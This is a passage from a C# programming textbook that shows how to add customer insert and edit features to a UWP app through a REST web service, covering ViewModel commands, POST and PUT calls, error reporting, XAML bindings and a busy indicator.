the web service; the splash screen will appear, but then the details of the
first customer, Orlando Gee, should be displayed.
23. Use the navigation buttons in the command bar to move through the list
of customers to verify that the form works as expected.
24. Return to Visual Studio and stop debugging.
Inserting, updating, and deleting data through a REST
web service
Apart from giving users the ability to query and display data, many apps have
the requirement to let users insert, update, and delete information. The
ASP.NET Web API implements a model that supports these operations
through the use of HTTP PUT, POST, and DELETE requests.
Conventionally, a PUT request modifies an existing resource in a web
service, and a POST request creates a new instance of a resource. A DELETE
request removes a resource. The code generated by the Add Scaffold wizard
in the ASP.NET Web API template follows these conventions.
Idempotency in REST web services
In a REST web service, PUT requests should be idempotent, which
means that if you perform the same update repeatedly, the result should
always be the same. In the case of the AdventureWorksService
example, if you modify a customer and set the telephone number to
“888-888-8888,” it does not matter how many times you perform this
operation because the effect is identical. This might seem obvious, but
you should design a REST web service with this requirement in mind.
With this design approach, a web service can be robust in the face of
concurrent requests, or even in the event of network failures (if a client
app loses the connection to the web service, it can simply attempt to
reconnect and perform the same request again without being concerned
whether the previous request was successful). Therefore, you should
think of a REST web service as a means for storing and retrieving data,
and you should not attempt to implement business-specific operations.
For example, if you were building a banking system, you might be
tempted to provide a CreditAccount method that adds an amount to the
balance in a customer’s account and expose this method as a PUT
operation. However, each time you invoke this operation, the result is
an incremental credit to the account. Therefore, it becomes necessary to
track whether calls to the operation are successful. Your app cannot
invoke this operation repeatedly if it thinks an earlier call failed or
timed out because the result could be multiple, duplicated credits to the
same account.
For more information about managing data consistency in cloud
applications, see “Data Consistency Primer” at
https://msdn.microsoft.com/library/dn589800.aspx.
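The difference is easy to see in code. The two methods below are hypothetical and not part of the AdventureWorksService; they simply contrast an idempotent state-setting update with a non-idempotent increment:

class IdempotencyExamples
{
    class Account { public decimal Balance; }

    // Idempotent: the final state is the same after one call or after fifty.
    void SetPhoneNumber(Customer customer, string phone)
    {
        customer.Phone = phone;
    }

    // Not idempotent: each repeat changes the result, so retrying a
    // timed-out request could credit the account twice.
    void CreditAccount(Account account, decimal amount)
    {
        account.Balance += amount;
    }
}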
In the next exercise, you will extend the Customers app and add features with which users can add new customers and modify the details of existing customers. The app will construct and submit the appropriate REST requests by using the REST API client and model you generated by using Visual Studio. You will not provide any functionality to delete customers.
This restriction ensures that you have a record of all customers that have done
business with the Adventure Works organization, which might be required
for auditing purposes. Additionally, even if a customer has not been active
for a long time, there is a chance that the customer might place an order at
some point in the future.
Note It is becoming increasingly commonplace for business
applications never to delete data but simply to perform an update that
marks the data as “removed” in some way and prevents it from being
displayed. This is primarily because of the requirements to keep
complete data records, often to meet regulatory requirements.
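For example, a soft-delete design might add a flag column and filter on it in queries. The IsDeleted property shown here is hypothetical; the AdventureWorks Customer table does not define it:

public partial class Customer
{
    // Hypothetical flag: rows are marked as removed rather than deleted.
    public bool IsDeleted { get; set; }
}

// Queries then exclude flagged rows:
// var activeCustomers = db.Customers.Where(c => !c.IsDeleted);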
Implement add and edit functionality in the ViewModel class
1. Return to Visual Studio.
2. In Solution Explorer, double-click the Customer.cs file in the root folder
of the Customers project to display it in the Code and Text Editor
window.
3. Immediately after the Phone property, add the following public
properties shown in bold to the Customer class:
public class Customer : INotifyPropertyChanged
{
    ...
    public string Phone
    {
        ...
    }

    public System.Guid rowguid { get; set; }
    public System.DateTime ModifiedDate { get; set; }
    ...
}
The web service retrieves these fields from the database. Previously you have ignored them when copying data into the customers list, but these properties are important for updating data; the Entity Framework uses these properties to determine which rows to change and to help resolve conflicts if multiple users attempt to modify the same data simultaneously.
4. In the Customers project, delete the ViewModel.cs file to remove it from
the project. Allow Visual Studio to delete this file permanently.
5. Right-click the Customers project, point to Add, and then click Existing
Item. Select the ViewModel.cs file, which is located in the \Microsoft
Press\VCSBS\Chapter 27 folder in your Documents folder, and then
click Add.
The code in the ViewModel.cs file is getting rather lengthy, so it has
been reorganized into regions to make it easier to manage. The
ViewModel class has also been extended with the following Boolean
properties that indicate the mode in which the ViewModel is operating:
Browsing, Adding, or Editing. These properties are defined in the region
named Properties For Managing The Edit Mode:
IsBrowsing This property indicates whether the ViewModel is
in Browsing mode. When the ViewModel is in Browsing mode,
the FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands are enabled, and a view can invoke
these commands to browse data.
IsAdding This property indicates whether the ViewModel is in
Adding mode. In this mode, the FirstCustomer, LastCustomer,
PreviousCustomer, and NextCustomer commands are disabled.
You will define an AddCustomer command, a SaveChanges
command, and a DiscardChanges command that will be enabled
in this mode.
IsEditing This property indicates whether the ViewModel is in
Editing mode. As in Adding mode, in this mode, the
FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands are disabled. You will define an
EditCustomer command that will be enabled in this mode. The
SaveChanges command and DiscardChanges command will also
Download from finelybook [email protected]
1059
be enabled, but the AddCustomer command will be disabled. The
EditCustomer command will be disabled in Adding mode.
IsAddingOrEditing This property indicates whether the
ViewModel is in Adding or Editing mode. You will use this
property in the methods that you define in this exercise.
CanBrowse This property returns true if the ViewModel is in
Browsing mode and there is an open connection to the web
service. The code in the constructor that creates the
FirstCustomer, LastCustomer, PreviousCustomer, and
NextCustomer commands has been updated to use this property to
determine whether these commands should be enabled or
disabled, as follows:
public ViewModel()
{
    ...
    this.NextCustomer = new Command(this.Next,
        () => { return this.CanBrowse &&
                this.customers != null && !this.IsAtEnd; });
    this.PreviousCustomer = new Command(this.Previous,
        () => { return this.CanBrowse &&
                this.customers != null && !this.IsAtStart; });
    this.FirstCustomer = new Command(this.First,
        () => { return this.CanBrowse &&
                this.customers != null && !this.IsAtStart; });
    this.LastCustomer = new Command(this.Last,
        () => { return this.CanBrowse &&
                this.customers != null && !this.IsAtEnd; });
}
CanSaveOrDiscardChanges This property returns true if the
ViewModel is in Adding or Editing mode and has an open
connection to the web service.
The Methods For Fetching And Updating Data region contains the
following methods:
ValidateCustomer This method takes a Customer object and
examines the FirstName and LastName properties to ensure that
they are not empty. It also inspects the EmailAddress and Phone
properties to verify that they contain information that is in a valid
format. The method returns true if the data is valid and false
otherwise. You will use this method when you create the
SaveChanges command later in this exercise.
Note The code that validates the EmailAddress and Phone
properties performs regular expression matching by using the
Regex class defined in the System.Text.RegularExpressions
namespace. To use this class, you define a regular expression
in a Regex object that specifies the pattern that the data should
match, and then you invoke the IsMatch method of the Regex
object with the data that you need to validate. For more
information about regular expressions and the Regex class,
see “The Regular Expression Object Model” on the Microsoft
website at http://msdn.microsoft.com/library/30wbz966.
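As an illustration, the following statements show the pattern-then-IsMatch flow that the note describes. The regular expressions here are simplified examples and are not necessarily the exact patterns used in the supplied ViewModel.cs file:

using System.Text.RegularExpressions;

Regex emailPattern = new Regex(@"^[^@\s]+@[^@\s]+\.[^@\s]+$");
bool validEmail = emailPattern.IsMatch("orlando@adventure-works.com");

Regex phonePattern = new Regex(@"^[0-9()\- ]+$");
bool validPhone = phonePattern.IsMatch("888-888-8888");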
CopyCustomer The purpose of this method is to create a
shallow copy of a Customer object. You will use it when you
create the EditCustomer command to make a copy of the original
data of a customer before it is changed. If the user decides to
discard the changes, the original data can simply be copied back
from the copy made by this method.
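The supplied ViewModel.cs file contains the real CopyCustomer implementation; the sketch below shows the kind of shallow, property-by-property copy that the description implies (the exact property list may differ):

private void CopyCustomer(Customer source, Customer destination)
{
    destination.CustomerID = source.CustomerID;
    destination.Title = source.Title;
    destination.FirstName = source.FirstName;
    destination.LastName = source.LastName;
    destination.EmailAddress = source.EmailAddress;
    destination.Phone = source.Phone;
    destination.rowguid = source.rowguid;
    destination.ModifiedDate = source.ModifiedDate;
}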
6. In the ViewModel.cs file, find the Methods For Fetching And Updating
Data region (expand this region if necessary). In this region, above the
ValidateCustomer method, create the Add method shown here:
// Create a new (empty) customer
// and put the form into Adding mode
private void Add()
{
    Customer newCustomer = new Customer { CustomerID = 0 };
    this.customers.Insert(currentCustomer, newCustomer);
    this.IsAdding = true;
    this.OnPropertyChanged(nameof(Current));
}
This method creates a new Customer object. It is empty apart from the
CustomerID property, which is temporarily set to 0 for display purposes.
The real value for this property is generated when the customer is saved
to the database, as described earlier. The customer is added to the
customers list (the view uses data binding to display the data in this list),
the ViewModel is placed in Adding mode, and the PropertyChanged
event is raised to indicate that the Current customer has changed.
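The OnPropertyChanged call relies on the INotifyPropertyChanged implementation that the ViewModel class already provides. For reference, the canonical shape of that helper is shown below; this is a sketch (with a hypothetical class name), not the code from the supplied ViewModel.cs file:

using System.ComponentModel;

public class ViewModelBase : INotifyPropertyChanged
{
    public event PropertyChangedEventHandler PropertyChanged;

    protected virtual void OnPropertyChanged(string propertyName)
    {
        this.PropertyChanged?.Invoke(this,
            new PropertyChangedEventArgs(propertyName));
    }
}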
7. Add the following Command variable shown in bold to the list at the
start of the ViewModel class:
public class ViewModel : INotifyPropertyChanged
{
    ...
    public Command LastCustomer { get; private set; }
    public Command AddCustomer { get; private set; }
    ...
}
8. In the ViewModel constructor, instantiate the AddCustomer command as
shown here in bold:
public ViewModel()
{
    ...
    this.LastCustomer = new Command(this.Last, ...);
    this.AddCustomer = new Command(this.Add,
        () => { return this.CanBrowse; });
    ...
}
This code references the Add method that you just created. The
command is enabled if the ViewModel has a connection to the web
service and is in Browsing mode (the AddCustomer command will not
be enabled if the ViewModel is already in Adding mode).
9. After the Add method in the Methods For Fetching And Updating Data
region, create a private Customer variable called oldCustomer and
define another method called Edit:
// Edit the current customer
// - save the existing details of the customer
//   and put the form into Editing mode
private Customer oldCustomer;

private void Edit()
{
    this.oldCustomer = new Customer();
    this.CopyCustomer(this.Current, this.oldCustomer);
    this.IsEditing = true;
}
This method copies the details of the Current customer to the
oldCustomer variable and puts the ViewModel into Editing mode. In
this mode, the user can change the details of the current customer. If the
user subsequently decides to discard these changes, the original data can
be copied back from the oldCustomer variable.
10. Add the following Command variable shown in bold to the list at the
start of the ViewModel class:
public class ViewModel : INotifyPropertyChanged
{
    ...
    public Command AddCustomer { get; private set; }
    public Command EditCustomer { get; private set; }
    ...
}
11. In the ViewModel constructor, instantiate the EditCustomer command as
shown in bold in the following code:
public ViewModel()
{
    ...
    this.AddCustomer = new Command(this.Add, ...);
    this.EditCustomer = new Command(this.Edit,
        () => { return this.CanBrowse; });
    ...
}
This code is similar to the statement for the AddCustomer command,
except that it references the Edit method.
12. After the Edit method in the Methods For Fetching And Updating Data
region, add a method named Discard to the ViewModel class, as shown
here:
// Discard changes made while in Adding or Editing mode
// and return the form to Browsing mode
private void Discard()
{
    // If the user was adding a new customer, then remove it
    if (this.IsAdding)
    {
        this.customers.Remove(this.Current);
        this.OnPropertyChanged(nameof(Current));
    }

    // If the user was editing an existing customer,
    // then restore the saved details
    if (this.IsEditing)
    {
        this.CopyCustomer(this.oldCustomer, this.Current);
    }

    this.IsBrowsing = true;
}
The purpose of this method is to enable the user to discard any changes
made when the ViewModel is in Adding or Editing mode. If the
ViewModel is in Adding mode, the current customer is removed from
the list (this is the new customer created by the Add method), and the
PropertyChanged event is raised to indicate that the current customer in
the customers list has changed. If the ViewModel is in Editing mode, the
original details in the oldCustomer variable are copied back to the
currently displayed customer. Finally, the ViewModel is returned to
Browsing mode.
13. Add the DiscardChanges Command variable to the list at the start of the
ViewModel class, and update the constructor to instantiate this
command, as shown here in bold:
public class ViewModel : INotifyPropertyChanged
{
    ...
    public Command EditCustomer { get; private set; }
    public Command DiscardChanges { get; private set; }
    ...

    public ViewModel()
    {
        ...
        this.EditCustomer = new Command(this.Edit, ...);
        this.DiscardChanges = new Command(this.Discard,
            () => { return this.CanSaveOrDiscardChanges; });
    }
    ...
}
Notice that the DiscardChanges command is enabled only if the CanSaveOrDiscardChanges property is true; that is, when the ViewModel has a connection to the web service and is in Adding or Editing mode.
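Expressed as code, the property behind this test might look like the following sketch. The IsServiceConnected flag stands in for however the supplied ViewModel.cs tracks the connection to the web service, so treat that name as an assumption:

public bool CanSaveOrDiscardChanges =>
    (this.IsAdding || this.IsEditing) && this.IsServiceConnected;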
14. In the Methods For Fetching And Updating Data region, after the
Discard method, add one more method, named SaveAsync, as shown in
the code that follows. This method should be marked with the async
modifier.
// Save the new or updated customer back to the web service
// and return the form to Browsing mode
private async void SaveAsync()
{
    if (this.ValidateCustomer(this.Current))
    {
        try
        {
            AdventureWorksService service = new AdventureWorksService();
            if (this.IsAdding)
            {
                // If the user is adding a new customer,
                // post the details back to the web service
                var cust = await service.CustomersOperations.PostCustomerAsync(this.Current);
                this.CopyCustomer(cust, this.Current);
                this.OnPropertyChanged(nameof(Current));
                this.IsAdding = false;
                this.IsBrowsing = true;
            }
            else
            {
                // If the user is updating an existing customer,
                // perform a PUT operation instead
                await service.CustomersOperations.PutCustomerAsync(
                    this.Current.CustomerID, this.Current);
                this.IsAdding = false;
                this.IsBrowsing = true;
            }
        }
        catch (Exception e)
        {
            // TODO: Handle any errors
        }
    }
}
The ValidateCustomer method ensures that the current customer displayed by the app contains valid data, such as a non-null first and last name, a correctly formatted email address, and a telephone number that contains only valid characters. If the details are valid, the code in the try block determines whether the user is adding a new customer or editing the details of an existing customer. If the user is adding a new customer, the code sends a POST message to the web service by using the PostCustomerAsync method of the REST API client model. This operation might take a little time, so the code uses the asynchronous version of the operation to prevent the UI of the Customers app from freezing.
Keep in mind that the POST request is sent to the PostCustomer method
in the CustomersController class in the web service, and this method
expects a Customer object as its parameter. The details are transmitted in
JSON format. You might also recall that the CustomerID column in the
Customer table in the AdventureWorks database contains automatically
generated values. The user does not provide a value for this data when a
customer is created; rather, the database itself generates the value when
a customer is added to the database. In this way, the database can ensure
that each customer has a unique customer ID. The PostCustomerAsync method in the REST API client model returns the details for the newly created customer, including the customer ID. The
code that you have added updates the details displayed by the Customers
app with the new data.
If the user is editing an existing customer, the app generates a PUT
request that is passed to the PutCustomer method in the
CustomersController class in the web service by using the
PutCustomerAsync method of the REST API client model. The
PutCustomerAsync method updates the details of the customer in the
database and expects the customer ID and customer details as
parameters. Again, this data is transmitted to the web service in JSON
format.
15. Add the SaveChanges Command variable shown here to the list at the
start of the ViewModel class, and update the constructor to instantiate
this command, as shown in the following:
public class ViewModel : INotifyPropertyChanged
{
    ...
    public Command DiscardChanges { get; private set; }
    public Command SaveChanges { get; private set; }
    ...

    public ViewModel()
    {
        ...
        this.DiscardChanges = new Command(this.Discard, ...);
        this.SaveChanges = new Command(this.SaveAsync,
            () => { return this.CanSaveOrDiscardChanges; });
        ...
    }
    ...
}
16. On the Build menu, click Build Solution and verify that your app
compiles without any errors.
The web service needs to be updated to support the edit functionality.
Specifically, if you are adding or editing a customer, you should set the
ModifiedDate property of the customer to reflect the date on which the
change was made. Additionally, if you are creating a new customer, you must
populate the rowguid property of the Customer object with a new GUID
before you can save it. (This is a mandatory column in the Customer table;
other apps inside the Adventure Works organization can use this column to
track information about customers.)
Note GUID stands for globally unique identifier. A GUID is a 128-bit value, generated by Windows and usually displayed as a string, that is almost guaranteed to be unique (there is a very small possibility that Windows might generate a nonunique GUID, but the possibility is so infinitesimally small that it can be discounted). GUIDs are frequently used by databases as key values to identify individual rows, as in the case of the Customer table in the AdventureWorks database.
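Generating a GUID in C# is a one-line operation, which is exactly what the web service will do in the next exercise:

Guid id = Guid.NewGuid();
Console.WriteLine(id); // for example: 3f2504e0-4f89-41d3-9a0c-0305e82c3301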
Update the web service to support add and edit functionality
1. In Solution Explorer, in the AdventureWorksService project, expand the
Controllers folder and open the CustomersController.cs file to display it
in the Code and Text Editor window.
2. In the PostCustomer method, before the statements that save the new
customer in the database, add the following code shown in bold.
// POST api/Customers
[ResponseType(typeof(Customer))]
public async Task<IHttpActionResult> PostCustomer(Customer customer)
{
    if (!ModelState.IsValid)
    {
        ...
    }

    customer.ModifiedDate = DateTime.Now;
    customer.rowguid = Guid.NewGuid();
    db.Customers.Add(customer);
    await db.SaveChangesAsync();
    ...
}
3. In the PutCustomer method, update the ModifiedDate property of the
customer before the statement that indicates that the customer has been
modified, as shown here in bold:
// PUT api/Customers/5
[ResponseType(typeof(void))]
public async Task<IHttpActionResult> PutCustomer(int id, Customer customer)
{
    ...
    customer.ModifiedDate = DateTime.Now;
    db.Entry(customer).State = EntityState.Modified;
    ...
}
4. Redeploy the web service to the cloud, as follows:
a. In Solution Explorer, right-click the AdventureWorksService project,
and then click Publish.
b. On the Publish page of the wizard, click Publish. This action should
overwrite the existing web service that you deployed to Azure earlier.
Correcting a problem with the REST API client
code
At the time of writing, I found an issue with the code generated by
Visual Studio for the REST API client model. Specifically, the
PostCustomerWithHttpMessagesAsync method does not handle the
HTTP Created response that a REST web service is likely to send back
when a new entity is successfully added. Currently, the
PostCustomerWithHttpMessagesAsync method constructs an HTTP
POST request which it sends to the web service. It waits for the
response, and if the HTTP status code in the response is anything other
than 200 (the HTTP status code for OK), it throws an exception.
However, a REST web service is allowed to send back other 2xx status
codes, all of which can indicate success. For example, a POST request
is likely to result in the status code 201 (Created) rather than a plain 200
(OK).
Although this goes against the earlier advice not to edit the code generated by Visual Studio for the REST API client model directly, the simplest solution is to change this code manually, as follows:
1. In Solution Explorer, in the Customers project, expand the
AdventureWorksService nnnnnnnnn folder, expand Models, and
double-click the CustomerOperations.cs file to display it in the
Code and Text Editor window.
2. Find the PostCustomerWithHttpMessagesAsync method.
3. In this method, find the following line:
if ((int)_statusCode != 200)
4. Change this line as follows, in bold:
if ((int)_statusCode != 200 && (int)_statusCode != 201)
5. Still in the PostCustomerWithHttpMessagesAsync method, find the
following code:
// Deserialize response
if ((int)_statusCode == 200)
6. Change this code as follows, in bold:
// Deserialize response
if ((int)_statusCode == 200 || (int)_statusCode == 201)
7. On the Build menu, click Rebuild Solution.
This issue might be fixed in future updates to Visual Studio, so
check first before making these changes to your code.
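An alternative to enumerating individual status codes is to treat the whole 2xx range as success; the HttpResponseMessage class exposes an IsSuccessStatusCode property for exactly this purpose. Whether you can substitute it here depends on how the generated method is structured, so the following is a sketch rather than a drop-in replacement:

using System.Net.Http;

static bool IsSuccess(HttpResponseMessage response)
{
    // True for any status code from 200 through 299.
    return response.IsSuccessStatusCode;
}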
Reporting errors and updating the UI
You have added the commands by which a user can retrieve, add, edit, and
save customer information. However, if something goes wrong and an error
occurs, the user is not going to know what has happened because the
ViewModel class does not include any error-reporting capabilities. One way
to add such a feature is to capture the exception messages that occur and
expose them as a property of the ViewModel class. A view can use data
binding to connect to this property and display the error messages.
Add error reporting to the ViewModel class
1. Return to the Customers project and display the ViewModel.cs file in
the Code and Text Editor window.
2. After the ViewModel constructor, add the private _lastError string
variable and public LastError string property shown here:
private string _lastError = null;

public string LastError
{
    get => this._lastError;
    private set
    {
        this._lastError = value;
        this.OnPropertyChanged(nameof(LastError));
    }
}
3. Find the ValidateCustomer method, and add the following statement
shown in bold immediately before the return statement:
private bool ValidateCustomer(Customer customer)
{
    ...
    this.LastError = validationErrors;
    return !hasErrors;
}
The ValidateCustomer method populates the validationErrors variable
with information about any properties in the Customer object that
contain invalid data. The statement that you have just added copies this
information to the LastError property.
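For context, the following sketch shows the shape that this description implies: accumulate messages in validationErrors, track hasErrors, and surface the messages through LastError. The real method in the supplied ViewModel.cs also validates the email address and phone number:

private bool ValidateCustomer(Customer customer)
{
    string validationErrors = string.Empty;
    bool hasErrors = false;

    if (string.IsNullOrWhiteSpace(customer.FirstName))
    {
        hasErrors = true;
        validationErrors += "The first name must not be empty\n";
    }

    if (string.IsNullOrWhiteSpace(customer.LastName))
    {
        hasErrors = true;
        validationErrors += "The last name must not be empty\n";
    }

    this.LastError = validationErrors;
    return !hasErrors;
}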
4. Find the SaveAsync method. In this method, add the following code
shown in bold to catch any errors and HTTP web service failures:
private async void SaveAsync()
{
    // Validate the details of the Customer
    if (this.ValidateCustomer(this.Current))
    {
        ...
        try
        {
            ...
            if (this.IsAdding)
            {
                ...
                this.IsBrowsing = true;
                this.LastError = String.Empty;
            }
            else
            {
                ...
                this.IsBrowsing = true;
                this.LastError = String.Empty;
            }
        }
        catch (Exception e)
        {
            // TODO: Handle any errors
            this.LastError = e.Message;
        }
    }
}
5. Find the Discard method, and then add the statement shown here in bold
to the end of it:
private void Discard()
{
    ...
    this.IsBrowsing = true;
    this.LastError = String.Empty;
}
6. On the Build menu, click Build Solution and verify that the app builds
without any errors.
The ViewModel is now complete. The final stage is to incorporate the
new commands, state information, and error-reporting features into the view
provided by the Customers form.
Integrate add and edit functionality into the Customers form
1. Open the MainPage.xaml file in the Design View window.
The XAML markup for the MainPage form has already been modified,
and the following TextBlock controls have been added to the Grid
controls that display the data:
<Page
    x:Class="Customers.MainPage"
    ...>
    <Grid Style="{StaticResource GridStyle}">
        ...
        <Grid x:Name="customersTabularView" ...>
            ...
            <Grid Grid.Row="2">
                ...
                <TextBlock Grid.Row="6" Grid.Column="1" Grid.ColumnSpan="7"
                           Style="{StaticResource ErrorMessageStyle}"/>
            </Grid>
        </Grid>
        <Grid x:Name="customersColumnarView" Margin="20,10,20,110" ...>
            ...
            <Grid Grid.Row="1">
                ...
                <TextBlock Grid.Row="6" Grid.Column="0" Grid.ColumnSpan="2"
                           Style="{StaticResource ErrorMessageStyle}"/>
            </Grid>
        </Grid>
        ...
    </Grid>
    ...
</Page>
The ErrorMessageStyle referenced by these TextBlock controls is
defined in the AppStyles.xaml file.
2. Set the Text property of both TextBlock controls to bind to the LastError
property of the ViewModel, as shown here in bold:
...
<TextBlock Grid.Row="6" Grid.Column="1" Grid.ColumnSpan="7"
           Style="{StaticResource ErrorMessageStyle}"
           Text="{Binding LastError}"/>
...
<TextBlock Grid.Row="6" Grid.Column="0" Grid.ColumnSpan="2"
           Style="{StaticResource ErrorMessageStyle}"
           Text="{Binding LastError}"/>
3. The TextBox and ComboBox controls that display customer data on the
form should allow the user to modify this data only if the ViewModel is
in Adding or Editing mode; otherwise, they should be disabled. Add the
IsEnabled property to each of these controls and bind it to the
IsAddingOrEditing property of the ViewModel as follows:
...
<TextBox Grid.Row="1" Grid.Column="1" x:Name="id"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="1" Grid.Column="5" x:Name="firstName"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="1" Grid.Column="7" x:Name="lastName"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<ComboBox Grid.Row="1" Grid.Column="3" x:Name="title"
          IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="3" Grid.Column="3" ... x:Name="email"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="5" Grid.Column="3" ... x:Name="phone"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="0" Grid.Column="1" x:Name="cId"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="2" Grid.Column="1" x:Name="cFirstName"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<TextBox Grid.Row="3" Grid.Column="1" x:Name="cLastName"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
<ComboBox Grid.Row="1" Grid.Column="1" x:Name="cTitle"
          IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="4" Grid.Column="1" x:Name="cEmail"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
...
<TextBox Grid.Row="5" Grid.Column="1" x:Name="cPhone"
         IsEnabled="{Binding IsAddingOrEditing}" .../>
4. Add a command bar to the bottom of the page, immediately after the top
command bar, using the <Page.BottomAppBar> element. This
command bar should contain buttons for the AddCustomer,
EditCustomer, SaveChanges, and DiscardChanges commands, as
follows:
<Page ...>
    ...
    <Page.TopAppBar>
        ...
    </Page.TopAppBar>
    <Page.BottomAppBar>
        <CommandBar>
            <AppBarButton x:Name="addCustomer" Icon="Add"
                Label="New Customer" Command="{Binding Path=AddCustomer}"/>
            <AppBarButton x:Name="editCustomer" Icon="Edit"
                Label="Edit Customer" Command="{Binding Path=EditCustomer}"/>
            <AppBarButton x:Name="saveChanges" Icon="Save"
                Label="Save Changes" Command="{Binding Path=SaveChanges}"/>
            <AppBarButton x:Name="discardChanges" Icon="Undo"
                Label="Undo Changes" Command="{Binding Path=DiscardChanges}"/>
        </CommandBar>
    </Page.BottomAppBar>
</Page>
Note that the icons referenced by the buttons are the standard images
provided with the Blank App template.
When the user clicks Save Changes, the interaction with the web service might be quick, or it could take a few seconds, depending on the speed of the HTTP connection to Azure and the load on the database behind the web service. It would be helpful to let users know that the application is saving the data and that, although the app might appear to be doing nothing, it is active behind the scenes. In a UWP app, you can use a ProgressRing control to provide a visual cue. This control should be displayed while the ViewModel is busy communicating with the web service but be inactive otherwise.
Add a busy indicator to the Customers form
1. Display the ViewModel.cs file in the Code and Text Editor window.
After the LastError property, add the private _isBusy field and public
IsBusy property, as shown here:
private bool _isBusy;

public bool IsBusy
{
    get => this._isBusy;
    set
    {
        this._isBusy = value;
        this.OnPropertyChanged(nameof(IsBusy));
    }
}
2. Modify the SaveAsync method and add the following statements shown
in bold. These statements set and reset the IsBusy indicator while the
method runs:
private async void SaveAsync()
{
    this.IsBusy = true;
    if (this.ValidateCustomer(this.Current))
    {
        ...
    }
    this.IsBusy = false;
}
3. Open the MainPage.xaml file in the Design View window.
4. In the XAML pane, add the ProgressRing control shown in bold in the
following code as the first item in the top-level Grid control:
<Grid Style="{StaticResource GridStyle}">
    <ProgressRing HorizontalAlignment="Center" VerticalAlignment="Center"
        Foreground="AntiqueWhite" Height="100" Width="100"
        IsActive="{Binding IsBusy}" Canvas.ZIndex="1"/>
    <Grid x:Name="customersTabularView" Margin="40,104,0,0" ...>
    ...
Setting the Canvas.ZIndex property to “1” ensures that the
ProgressRing appears in front of the other controls displayed by the
Grid control.
Test the Customers app
1. On the Debug menu, click Start Debugging to build and run the app.
When the Customers form appears, notice that the TextBox and
ComboBox controls are disabled because the view is in Browsing mode.
2. On the form, verify that both the upper and lower command bars appear.
You can use the First, Next, Previous, and Last buttons in the upper
command bar as before (remember that the First and Previous buttons
will not be enabled until you move away from the first customer). In the
lower command bar, the Add and Edit buttons should be enabled, but
the Save Changes button and the Undo Changes button should be
disabled because the AddCustomer and EditCustomer commands are
enabled when the ViewModel is in Browsing mode, and the
SaveChanges and DiscardChanges commands are enabled only when
the ViewModel is in Adding or Editing mode.
3. In the bottom command bar, click the Edit Customer button.
4. The buttons in the top command bar become disabled because the ViewModel is now in Editing mode. The Add and Edit buttons are also disabled, but the Save Changes and Undo Changes buttons should now be enabled. Furthermore, the data entry fields on the form should be enabled, and the user can modify the details of the customer.
5. Change the details of the customer: blank out the first name, type Test
for the email address, type Test 2 for the phone number, and then click
Save Changes.
Note You must tab out of the phone number control (or click
another control on the main part of the form, or even click the form
itself) for the binding to copy the data to the view model and report
the illegal phone number. The same is true for any controls on the
form. This is due to the underlying mechanism implemented by
UWP apps; data in a bound control is not copied back to the data
source until the control loses focus. Clicking a button in a
command bar does not cause a change of focus, although tabbing
to a button does.
These changes violate the validation rules implemented by the
ValidateCustomer method. The ValidateCustomer method populates the
LastError property of the ViewModel with validation messages, which
are displayed on the form in the TextBlock that binds to the LastError
property.
6. Click Undo Changes, and verify that the original data is reinstated on the
form. The validation messages disappear, and the ViewModel reverts to
Browsing mode.
7. Click Add. The fields on the form should be cleared (apart from the ID field, which displays the value 0). Enter the details for a new customer. Be sure to provide a first name and last name, a correctly formatted email address, and a numeric phone number (you can also include parentheses, hyphens, and spaces).
8. Click Save Changes. If the data is valid (there are no validation errors),
your data should be saved to the database. You should see the ID
generated for the new customer in the ID field, and the ViewModel
should switch back to Browsing mode.
9. Experiment with the app by adding and editing more customers. Notice
that you can resize the view to display the columnar layout, and the form
should still work.
Note When you click Save Changes, you might or might not see the progress ring appear, depending on how quickly the changes are saved. If you want to simulate the operation running more slowly, add the following statement near the end of the SaveAsync method:
private async void SaveAsync()
{
    ...
    await Task.Delay(2000);
    this.IsBusy = false;
}
This code causes a delay of 2 seconds.
10. When you have finished, return to Visual Studio and stop debugging.
Summary
In this chapter, you learned how to use the Entity Framework to create an
entity model that you can use to connect to a SQL Server database. The
database can be running locally or in the cloud. You also saw how to create a
REST web service that a UWP app can use to query and update data in the
database through the entity model, and you learned how to integrate code that
calls the web service into a ViewModel.
You have now completed all the exercises in this book. I hope you are
thoroughly conversant with the C# language and understand how to use
Visual Studio 2017 to build professional apps for Windows 10. However, this
is not the end of the story. You have cleared the first hurdle, but the best C#
programmers learn from continued experience, and you can gain this
experience only by building C# apps. As you do so, you will discover new
ways to use the C# language and many features in Visual Studio 2017 that I
have not had space to cover in this book. Also, remember that C# is an
evolving language. Back in 2001, when I wrote the first edition of this book,
C# introduced the syntax and semantics necessary to build apps that made
use of Microsoft .NET Framework 1.0. Some enhancements were added to
Visual Studio and .NET Framework 1.1 in 2003, and then in 2005, C# 2.0
emerged with support for generics and .NET Framework 2.0. C# 3.0 added
numerous features, such as anonymous types, lambda expressions, and, most
significantly, LINQ. C# 4.0 extended the language further with support for
named arguments, optional parameters, contravariant and covariant
interfaces, and integration with dynamic languages. C# 5.0 added full support
for asynchronous processing through the async keyword and the await
operator. C# 6.0 provided further tweaks to the language, such as expression-
bodied methods, string interpolation, the nameof operator, exception filters,
and many others. C# 7 includes many additional features, such as Tuples,
local functions in methods, support for expression-bodied members in
properties and other scenarios, pattern matching in switch statements, the
ability to handle and throw exceptions in new ways, enhanced syntax for
defining numeric literals, and a general tidying up of the way in which you
can define and use out variables.
In parallel with the evolution of the C# programming language, the
Windows operating system has changed considerably since the first edition of
this book. Arguably, the changes instigated by Windows 8 onward have been
the most radical in this period, and developers familiar with earlier editions of
Windows now have exciting new challenges to build apps for the modern,
touch-centric, mobile platform that Windows 10 provides. Furthermore,
modern business apps are extending beyond the boundaries of the
organization and out to the cloud, requiring you to implement highly scalable
solutions that might need to support thousands or even millions of concurrent
